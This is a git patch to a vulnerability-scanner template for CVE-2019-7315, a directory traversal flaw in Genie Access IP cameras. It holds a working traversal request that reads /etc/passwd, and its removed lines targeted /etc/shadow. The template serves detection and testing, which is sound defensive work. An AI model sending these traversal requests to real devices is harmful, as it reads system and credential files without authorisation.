From bd121e999e90577789243461f3cf741cd71e2eb5 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 23 Jun 2022 23:59:11 +0530
Subject: [PATCH] Update and rename CVE-2019-7315.yaml to
 cves/2019/CVE-2019-7315.yaml

---
 .../2019/CVE-2019-7315.yaml                      | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)
 rename CVE-2019-7315.yaml => cves/2019/CVE-2019-7315.yaml (81%)

diff --git a/CVE-2019-7315.yaml b/cves/2019/CVE-2019-7315.yaml
similarity index 81%
rename from CVE-2019-7315.yaml
rename to cves/2019/CVE-2019-7315.yaml
index 7470cb3982..2e4d8459aa 100644
--- a/CVE-2019-7315.yaml
+++ b/cves/2019/CVE-2019-7315.yaml
@@ -5,28 +5,28 @@ info:
   severity: high
   description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow.
   reference:
+    - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
     - https://vuldb.com/?id.136593
     - https://www.cvedetails.com/cve/CVE-2019-7315
-    - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-7315
     cwe-id: CWE-22
-  tags: cve,cve2019,camera,genie,lfi
+  tags: cve,cve2019,camera,genie,lfi,iot
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/../../../../../etc/shadow"
+      - "{{BaseURL}}/../../../../../etc/passwd"
+
     matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "root:*:"
-          - "bin:*:"
-        condition: and
+      - type: regex
         part: body
+        regex:
+          - "root:.*:0:0:"
+
       - type: status
         status:
           - 200